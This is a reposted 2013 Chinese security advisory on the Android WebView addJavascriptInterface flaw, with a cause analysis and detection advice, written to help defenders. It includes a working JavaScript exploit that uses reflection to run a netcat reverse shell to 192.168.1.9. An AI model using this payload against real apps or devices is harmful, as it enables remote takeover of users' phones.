紧急公告:Android系统webview控件接口存安全隐患

日前,谷歌旗下Android系统爆出webview控件存在接口安全隐患,会令绝大部分使用Andorid系统为核心的设备沦为黑客的“玩物”。目前,包括微信、手机QQ、遨游云浏览器等多款Andorid应用已在漏洞报告平台乌云被曝光可以进行手机挂马,当用户打开挂马页面后,手机就会自动执行黑客指令,出现被安装恶意扣费软件、向好友发送欺诈短信、通讯录和短信被窃取等严重后果。

安恒信息提醒开放手机业务的相关企事业单位尽快进行自检修复。

一、webView及addJavaScriptInterface简介: Android SDK中封装了一个webview控件,主要用于控制网页浏览,甚至可以简单的认为是个小型浏览器。其中包含了一个接口函数addJavascriptInterface,通过这个函数能让js代码调用java类对象的一切函数和属性。

二、漏洞分析:

一般在android代码中,这样实现:

settings.setJavaScriptEnabled(true);

settings.setJavaScriptCanOpenWindowsAutomatically(true); mWebView.addJavascriptInterface(new MyClass(), "javaObj");

这个时候可以认为,webview将MyClass类的一个实例化的对象,名字叫javaObj,传递到了js中,js可以通过javaObj对象调用MyClass类的所有方法和属性。

但是设计者没有考虑到,一个后台的类对象可以通过forName()和getMethod()方法获得其他类对象的特定方法,比如下面的代码:

<script> function execute(cmdArgs) { return XXX.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs); } execute(["/system/bin/sh","-c","nc 192.168.1.9 8088|/system/bin/sh|nc 192.168.1.9 9999"]); </script>

以上就是漏洞形成的根本原因,可以认为是这个接口函数给了前端页面一个调用后台java代码的机会,并且本意只是让前台调用通过这个接口函数传递过来的java类对象的方法和属性,但是没注意到后台的java类对象能获取如此大的权限以执行除了该对象的方法和属性意外的类的方法。

三、漏洞防护与检测:

1. 通过反编译apk获取smali文件中的代码,或者再通过方便易smali到java文件,检测smali和java文件中的代码,查看手机应用是否存在这个漏洞;

2. 通过检测传入的参数是否存在执行linux命令,或者存在shellcode;

3. 检测手机流量,发现其中是否存在异常流量。

原文发布于微信公众号 - 安恒信息(DBAPP2013)

原文发表时间:2013-09-06

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏华章科技

Java 10新特性解密

请注意,本文中所包含的信息在写本文时是准确的。但是到发布时,JDK 10特性组预计将会增加。

742
来自专栏SEO

「SEO技巧」页面分页优化技巧

3407
来自专栏非典型技术宅

Swift多线程之Operation:按优先级加载图片1. 进程和线程2. Operation3. Basic Demo4. 案例实现

1323
来自专栏walterlv - 吕毅的博客

不再为命名而苦恼!使用 MSTestEnhancer 单元测试扩展,写契约就够了

发布于 2018-02-22 11:52 更新于 2018-08...

1191
来自专栏王清培的专栏

WebAPi的可视化输出模式(RabbitMQ、消息补偿相关)——所有webapi似乎都缺失的一个功能

最近的工作我在做一个有关于消息发送和接受封装工作。大概流程是这样的,消息中间件是采用rabbitmq,为了保证消息的绝对无丢失,我们需要在发送和接受前对消息进行...

1120
来自专栏编程微刊

2018年各大互联网前端面试题四(美团)

1532
来自专栏ChaMd5安全团队

zctf web100的简单分析

zctf web100的简单分析 From ChaMd5安全团队核心成员 Pcat web100 xctf2017第二站的zctf,web100的链接点开之后...

36115
来自专栏微服务生态

Akka简单的性能测试

这种方案是采用MQ作为中间的媒介,在服务端采用线程池异步处理任务,处理完成之后将结果发送到MQ中,客户端采用侦听的方式得到结果继续进行处理。

1381
来自专栏cloudskyme

linux内存查看方式

如下显示free是显示的当前内存的使用,-m的意思是M字节来显示内容.我们来一起看看. $ free -m total ...

4064
来自专栏信安之路

漏洞分析之Typecho二连爆

这段时间 Typecho 在十几天之内连续爆了两个最高可 getshell 的洞,先是 SSRF 可打内网,再是反序列化直接前台 getshell ……安全性这...

1620

扫码关注云+社区